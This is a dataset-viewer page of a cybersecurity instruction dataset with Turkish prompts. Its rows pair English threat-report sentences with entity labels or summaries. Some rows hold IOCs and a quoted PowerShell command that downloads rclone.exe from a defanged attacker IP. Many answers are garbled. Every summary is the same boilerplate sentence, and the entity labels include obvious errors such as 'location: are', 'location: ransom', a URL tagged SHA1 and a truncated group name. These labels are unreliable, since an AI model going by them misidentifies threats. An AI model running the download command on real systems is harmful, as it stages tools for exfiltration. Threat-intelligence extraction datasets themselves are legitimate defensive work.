instruction
stringclasses 2
values | input
stringlengths 3
5.01k
| output
stringlengths 10
5.79k
|
|---|---|---|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
The second packer we discovered consists of two layers, with the second being the custom UPX packer discussed above.
|
tools: UPX packer
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
I'm going to look at item number two.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Updated April 1, 2022, at 11 a.m. PT.
|
TIME: April 1, 2022, at 11 a.m. PT.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
King also explains that the CSC report supports operationalizing cybersecurity partnership with the private sector and remolding how the government works with the private sector.
|
identity: CSC; identity: King
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
This vulnerability was due to the lack of proper check on the provided PropertyDescriptor in CachedIntrospectionResults() so that class.classLoader is allowed to be utilized to modify the search path of the system's class loader and cause the program to invoke remote Java code.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
In the same way that the kill chain has become an outdated concept, so has the notion that EDR is sufficient to speed up detection and response by solely using the endpoint.
|
SOFTWARE: EDR
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The victim would need to have a session open on these websites from Safari for cookies to be successfully exfiltrated.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Related IOCs
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Of these, only the two commands involving /etc/passwd would possibly suggest malicious intent for exploitation – the rest of the commands suggest general scanning activity.
|
FILEPATH: /etc/passwd
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
As always, we recommend keeping your Microsoft products up to date with the latest patches to mitigate this vulnerability.
|
identity: Microsoft
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
In Carbanak attacks, the groups’ attacks can involve logging into services that accept remote connections and using stolen password hashes through the “pass the hash” method.
|
attack-pattern: pass the hash; threat-actor: Carbanak; attack-pattern: using stolen password hashes
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
-ms[.]net C&C cdn-sop[.]net C&C fqn-cloud[.]net C&C ms-trace[.]net C&C imail.aop.gov-af[.]org Phishing Domain mail-apfgavnp.hopto[.]org Phishing Domain mail-apfgovnp.ddns[.]net Phishing Domain mail-kmgcom.ddns[.]net Phishing Domain mail-mfagovcn.hopto[.]org Phishing Domain mail
|
attack-pattern: Phishing; attack-pattern: Phishing; attack-pattern: Phishing; attack-pattern: Phishing; attack-pattern: Phishing
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
What got our attention is that the samples were renamed to be similar to the naming convention of Windows update files (i.e., “Windows-KB275122-x86.exe”).
|
FILEPATH: Windows-KB275122-x86.exe
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Pyinstaller remote access tool newsblog.js 304ea86131c4d105d35ebbf2784d44ea24f0328fb483db29b7ad5ffe514454f8 Trojan.JS.DLOADR.AUSUOL VBS downloader new.exe fb414beebfb9ecbc6cb9b35c1d2adc48102529d358c7a8997e903923f7eda1a2 HackTool.Win64.LIGOLO.A LIGOLO tunneling tool Browser64.exe 3495b0a6508f1af0f95906efeba36148296dccd2ab8ffb4e569254b683584fea HackTool.Win64.BrowserDumper.A
|
location: remote; location: tool; SHA2: 304ea86131c4d105d35ebbf2784d44ea24f0328fb483db29b7ad5ffe514454f8; SHA2: fb414beebfb9ecbc6cb9b35c1d2adc48102529d358c7a8997e903923f7eda1a2; location: tool; SHA1: 3495b0a6508f1af0f95906efeba36148296dccd2ab8ffb4e569254b683584fea
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
But we didn't cover a number of areas that I thought we were going to cover, but we didn't.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Another interesting PDB string we found is - D:\Work\Project\VS\house\Apple\Apple_20180115\Release\InstallClient.pdb.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The parameter rid is a global counter which records the number of exploitation attempts.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The screenshot gets captured when a command is received from the C&C server.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
A log file is written containing a count of the emails that were downloaded.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Once a user provides credentials in the dialog, they are posted to an attacker controlled domain.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The process of delivering malware by a URL can include various techniques.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
The dlrarhsiva.exe Crimson RAT executable
|
malware: Crimson RAT
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Over the past 24 hours, the list of entities on the leaks section has expanded to 48 gov.ua domains and one Ukranian company (motorsich[.]com) that builds engines for airplanes and helicopters.
|
TIME: the past 24 hours; identity: Ukranian company; DOMAIN: motorsich[.]com
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Raise employee awareness.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 7. Unverified developer warning with the “Open” button noticeably missing
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
This RATANKBA backdoor is what is used to communicate with RATANKBA’s Command-and-Control (C&C) server.
|
malware: RATANKBA; tools: RATANKBA; location: and
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The reality is that cybercriminals are out for profit.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Cassandra Crypter
|
tools: Cassandra Crypter
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 15.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
How did Lurk evolve from a clique of threat actors to a full-fledged cybercriminal group?
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
The following are samples using this evasion: https://www.virustotal.com/gui/file/5094028a0afb4d4a3d8fa82b613c0e59d31450d6c75ed96ded02be1e9db8104f/detection
|
location: are; SHA1: https://www.virustotal.com/gui/file/5094028a0afb4d4a3d8fa82b613c0e59d31450d6c75ed96ded02be1e9db8104f/detection
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Like bitcoin, Monero is generated through “mining” a computationally intensive process that provides cryptocurrency credit in exchange for computing resources provided in service to the cryptocurrency and its transaction infrastructure.
|
SOFTWARE: Monero
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Among the earliest samples we received were two almost identical RAR files that contained a file called info.exe.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
HTShell supports importing additional config files.
|
malware: HTShell
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
HyperBro Malware Family
|
malware: HyperBro
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
In a worst-case attack scenario, this vulnerability could be used to render the phone unusable (i.e., a “brick”) or to install any kind of malware including (but not limited to) ransomware or information stealers.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The list of predefined ports to bind an HTTP service to, which is reversed After accessing the infected machine with an HTTP server bound to a predefined port
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The latest episode of the Don’t Panic cybersecurity podcast is now live.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
As the situation continues to develop, we’ll continue to update our blog with the latest information.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
To view the certificate information just open the given APK file as a zip file.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 8.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
A few were observed displaying a fake error message requiring user click-through to continue execution.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Organizations can benefit from having Trend Micro™ endpoint solutions such as Trend Micro Smart Protection Suites and Worry-Free™ Business Security.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Reconnaissance This attack does not appear to be targeted.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
It was last updated on August 5, 2020.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Paying close attention to the domain name of a website before performing any further action can also help mitigate threats, including threats like Urpage that have targeted victims.
|
threat-actor: Urpage
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
SMS information collected by the receiver is saved in a hashmap with “other” as the key and sent to a method that uploads the message to 112.126.69.51 as shown in Figure 4.
|
IPV4: 112.126.69.51
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The below example shows that the blocking works (output from the "sc start" command):
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Nearly all of us have a use for Microsoft Office documents.
|
SOFTWARE: Microsoft Office
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Are Patchwork and Confucius the same group?
|
threat-actor: Patchwork; threat-actor: Confucius
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Waterbear, which has been around for several years, is a campaign that uses modular malware capable of including additional functions remotely.
|
campaign: Waterbear
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Two instances of PowerShell are spawned with an encoded command to sleep for 10 seconds, e.g. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA== 3.
|
FILEPATH: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; tools: PowerShell
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
While the SunOrcal malware family has been confirmed to have been active since 2013, possibly even earlier, this new variant has been observed targeting regions outside of the typical target radius for this threat group, now expanding to include Vietnam and Myanmar.
|
malware: SunOrcal; TIME: 2013; location: Vietnam; location: Myanmar
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Gather information on an endpoint Gathers information from the endpoint such as the current logged on user, operating system details, IP address, hostname, mac address
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 1. TA505’s latest infection chain
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
One of the most notable characteristics of APT35 is their impersonation of conference officials to conduct phishing attacks.
|
location: most; attack-pattern: phishing
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
This script is likely activated by exploiting a cross-site scripting (XSS) vulnerability in the said store’s administration portal.
|
SOFTWARE: store’s administration portal; malware: script; attack-pattern: cross-site scripting (XSS)
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Unit 42 is unaware of ANY successful recovery after paying the ransom.
|
identity: Unit 42; location: ransom
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Last year, TAG discovered that a single threat actor was capitalizing on five zero-day vulnerabilities.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The vast majority of CISOs are saddled with legacy operating systems and applications, along with a lack of funding.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Infection chain
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
The Bahamut Link Fake websites
|
threat-actor: Bahamut
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Figure 1. ATT&CK® tactics shared between Carbanak and FIN7 The following are the tactics and techniques that are employed by Carbanak and FIN7, as shared by MITRE.
|
threat-actor: Carbanak; threat-actor: FIN7; threat-actor: Carbanak; threat-actor: FIN7; identity: MITRE
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Perception of an “unsafe” business could turn customers towards competitors who can offer a better and more secure shopping experience.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 7.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
As the malware infects more systems, the systems begin sending more e-mails which leads to more infections.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Despite being unknown even to industry practitioners, the Data Distribution Service (DDS) protocol has been in use for more than a decade.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Iranian TTPs:
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 6.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Network destination for template injection: 176[.]119[.]147[.]225 Network destination for VBS: 176[.]57[.]215[.]115 These IP addresses are from Russian hosting companies.
|
IPV4: 176[.]119[.]147[.]225; IPV4: 176[.]57[.]215[.]115; location: are
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
The stolen files are then exfiltrated by abusing a cloud storage service.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
16 Name of the shellcode DLPPREM32.bin 20 Name of the encrypted payload data.res 24 MD5 of the encrypted payload e43e40416520dab5b4c44ac8af907078 28 Name of the encrypted configuration config.res 32 Name of the registry key value servTest 36 Name of the service DisplayName Servdisplay Table 1.
|
MD5: e43e40416520dab5b4c44ac8af907078
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
(Figure 2)
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
While the techniques aren’t new, the attack attempts appear to be successful, collecting over 800 credentials from company executives at the time of writing.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Examining the BIOPASS RAT modules We observed a few scheduled tasks being created, with the number dependent on the analyzed sample.
|
malware: BIOPASS RAT
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
It then spawns a new instance of 'C:\\windows\\system32\\cmd.exe' with a window name of 'Chrome-Update'.
|
FILEPATH: C:\\windows\\system32\\cmd.exe
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
This has happened to multiple spyware vendors over the past ten years, raising the specter that their stockpiles can be released publicly without warning.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Three of the backdoors, NFlog, PoisonIvy, and NewCT have previously been publicly associated with DragonOK.
|
malware: NFlog; malware: PoisonIvy; malware: NewCT; threat-actor: DragonOK
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Figure 10.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
A certain hayat22 and love piqued our interest.
|
identity: hayat22; identity: love
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Channel : #vcenter getsome bot.redis 48628ca95608a015f47506eb1dc6fad0cd04a4cf5d44fdb8f10255fe0aa3c29b C2 server : 64[.]32.6.143:80
|
SHA2: 48628ca95608a015f47506eb1dc6fad0cd04a4cf5d44fdb8f10255fe0aa3c29b; IPV4: 64[.]32.6.143:80
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
If the first value in the packet is 0x20 the file will delete all DDoS tasks.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Through our enterprise security platform, including IPS and WildFire, we continue to innovate and prevent advanced exploitation techniques.
|
SOFTWARE: WildFire
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
The actor is also responsible for the abuse of commonly used authentication mechanisms.
|
attack-pattern: abuse of commonly used authentication mechanisms
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Shortly after the U.S. Treasury sanctioned Ukrainian Parliament member Andrii Derkach for attempting to influence the U.S. electoral process, we removed 14 Google accounts that were linked to him.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -command "$(new-object System.Net.WebClient).DownloadFile('http://195[.]123[.]221[.]7:8080/rclone.exe', 'r.exe')
|
FILEPATH: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe; URL: http://195[.]123[.]221[.]7:8080/rclone.exe
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
A new folder named "Download" is created adjacent to the main binary.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
This is shown in the figure below.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
We think this indicates that it has the capability to bypass network security systems by using these common protocols to transfer data.
|
attack-pattern: bypass network security systems
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
In the last two years, but particularly in the last six months, the price of bitcoin and other cryptocurrencies experienced a massive price surge with respect to the U.S. dollar and other fiat currencies.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
We found the group was focused on stealing defense-, ocean-, and ship-related documents from target networks, which led us to believe that Tropic Trooper’s main purpose is to exfiltrate confidential information or intelligence.
|
threat-actor: Tropic Troope
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
Email us at u42comms@paloaltonetworks.com.
|
EMAIL: u42comms@paloaltonetworks.com
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Decoded “join” event sent to the C&C server.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
From an engineering point of view, this sole, specific targeting of files that matter significantly increases the chances of ransomware’s success.
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
In this new patch, every time Internet Explorer tries to free an object, it is not freed immediately.
|
SOFTWARE: Internet Explorer
|
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
|
This client got only a small fraction of the file restorations that were promised before the Conti ransomware representatives disappeared back into the dark web.
|
threat-actor: Conti
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
Attacks | Endpoints | Research
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
|
This post is also available in: 日本語 (Japanese)
|
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.